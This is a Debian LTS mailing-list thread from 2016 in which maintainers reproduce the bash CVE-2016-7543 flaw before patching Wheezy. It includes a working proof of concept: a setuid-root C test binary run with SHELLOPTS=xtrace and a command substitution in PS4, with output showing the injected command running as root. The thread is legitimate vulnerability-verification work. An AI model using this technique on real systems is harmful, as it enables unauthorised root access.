Hi BalintIt was the default shell that made the difference. Thanks again for this suggestion. I can reproduce the problem now. Very good.An interesting note is that it is only possible to escalate the privilege to root. If I change the owner of the file to www-data (and the setuid to 33) the id command is not executed as www-data.This means that the bash fix to only make a special case for root is good. I thought maybe the fix was incomplete.I'll look into the fixing part now. I have found the patch and it looks trivial. As I can reproduce it easily now (with changed default shell to bash) it should be trivial to verify whether the correction was good or not.Best regards// OlaOn 7 October 2016 at 09:26, Bálint Réczey <balint@balintreczey.hu> wrote:Hi,
2016-10-07 8:10 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
> Hi Balint
>
> Ah, it could be the default shell. I'll try that. Thanks for the suggestion.
>
> Merely that the command id is executed is not a reproduction. It has to be
> executed as another user than the one one executing the binary to be a
> security problem. If not it could be a bug but not a security bug (privilege
> escalation).
True, but it works on setuid binaries, too:
root@debian-wheezy:/home/vagrant# ls -alh /bin/sh
lrwxrwxrwx 1 root root 4 Oct 7 07:16 /bin/sh -> bash
root@debian-wheezy:/home/vagrant# gcc -xc - -otest <<< 'int main() {
setuid(0); system("/bin/date"); }'
root@debian-wheezy:/home/vagrant# chmod 4755 ./test
root@debian-wheezy:/home/vagrant# ls -l ./test
-rwsr-xr-x 1 root root 6877 Oct 7 07:19 ./test
root@debian-wheezy:/home/vagrant# exit
exit
vagrant@debian-wheezy:~$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=1000(vagrant)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(di p),44(vid/bin/date
Fri Oct 7 07:19:34 GMT 2016
vagrant@debian-wheezy:~$
Cheers,
Balint
>
> Best regards,
>
> // Ola
>
> On 7 October 2016 at 00:12, Bálint Réczey <balint@balintreczey.hu> wrote:
>>
>> Hi Ola,
>>
>> 2016-10-06 23:08 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
>> > Hi Matthias and Balint
>> >
>> > I have tried to reproduce the problem described in the openwall email.
>> > However I can not reproduce it. Have you been able to?
>> >
>> > On wheezy:
>> > ------------
>> > ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct 6 20:54:07 UTC 2016
>> > ola@tigereye:/$ ls -la test
>> > -rwsr-xr-x 1 root root 6824 Oct 6 20:52 test
>> > ola@tigereye:/$ dpkg -l bash
>> > ...CUT...
>> > ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell
>> >
>> > On jessie:
>> > ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct 6 22:48:35 CEST 2016
>>
>> When I set the default shell to bash it worked for me.
>> Please try with sudo dpkg-reconfigure dash.
>>
>> > ola@tigereye:~/exploit$ dpkg -l bash
>> > ...CUT...
>> > ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell
>> >
>> > I think it may be because SHELLOPTS is a read-only variable.
>> >
>> > ola@tigereye:~/exploit$ SHELLOPTS=xtrace
>> > bash: SHELLOPTS: readonly variable
>> >
>> > Do you think I have made a mistake in the reproduction or is it so that
>> > the
>> > patch was actually not on a real problem (at least in Debian).
>> >
>> > Not even if I change the code like this:
>> > ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
>> > system("/bin/bash -c /bin/date"); }'
>> > ola@tigereye:~/exploit$ ./test2
>> > Thu Oct 6 23:04:11 CEST 2016
>> > ola@tigereye:~/exploit$ set -x
>> > ola@tigereye:~/exploit$ ./test2
>> > uid=1000(ola) gid=1000(ola)
>> >
>> > groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30( dip),44(video),46(plugdev),108 (netdev)./test2
>> > Thu Oct 6 23:04:18 CEST 2016
>>
>> This runs the command passed in PS4 thus I consider this a reproduction.
>>
>> Cheers,
>> Balnit
>>
>> >
>> > My conclusion is that there is no security hole. But I may be mistaken.
>> >
>> > Can anyone else reproduce the issue?
>> >
>> > Best regards,
>> >
>> > // Ola
>> >
>> > On 6 October 2016 at 12:29, Ola Lundqvist <ola@inguza.com> wrote:
>> >>
>> >> Hi Matthias
>> >>
>> >> I will look into this.
>> >>
>> >> // Ola
>> >>
>> >> On 6 October 2016 at 01:06, Matthias Klose <doko@debian.org> wrote:
>> >>>
>> >>> On 05.10.2016 16:02, Balint Reczey wrote:
>> >>> > Hello dear maintainer(s),
>> >>> >
>> >>> > the Debian LTS team would like to fix the security issues which are
>> >>> > currently open in the Wheezy version of bash:
>> >>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>> >>> >
>> >>> > Would you like to take care of this yourself?
>> >>>
>> >>> please go ahead.
>> >>>
>> >>> Matthias
>> >>>
>> >>
>> >>
>> >>
>> >> --
>> >> --- Inguza Technology AB --- MSc in Information Technology ----
>> >> / ola@inguza.com Folkebogatan 26 \
>> >> | opal@debian.org 654 68 KARLSTAD |
>> >> | http://inguza.com/ Mobile: +46 (0)70-332 1551 |
>> >> \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
>> >> ------------------------------------------------------------ ---
>> >>
>> >
>> >
>> >
>> > --
>> > --- Inguza Technology AB --- MSc in Information Technology ----
>> > / ola@inguza.com Folkebogatan 26 \
>> > | opal@debian.org 654 68 KARLSTAD |
>> > | http://inguza.com/ Mobile: +46 (0)70-332 1551 |
>> > \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
>> > ------------------------------------------------------------ ---
>> >
>
>
>
>
> --
> --- Inguza Technology AB --- MSc in Information Technology ----
> / ola@inguza.com Folkebogatan 26 \
> | opal@debian.org 654 68 KARLSTAD |
> | http://inguza.com/ Mobile: +46 (0)70-332 1551 |
> \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
> ------------------------------------------------------------ ---
>
----- Inguza Technology AB --- MSc in Information Technology ----/ ola@inguza.com Folkebogatan 26 \| opal@debian.org 654 68 KARLSTAD || http://inguza.com/ Mobile: +46 (0)70-332 1551 |\ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /----------------------------------------------------------- ----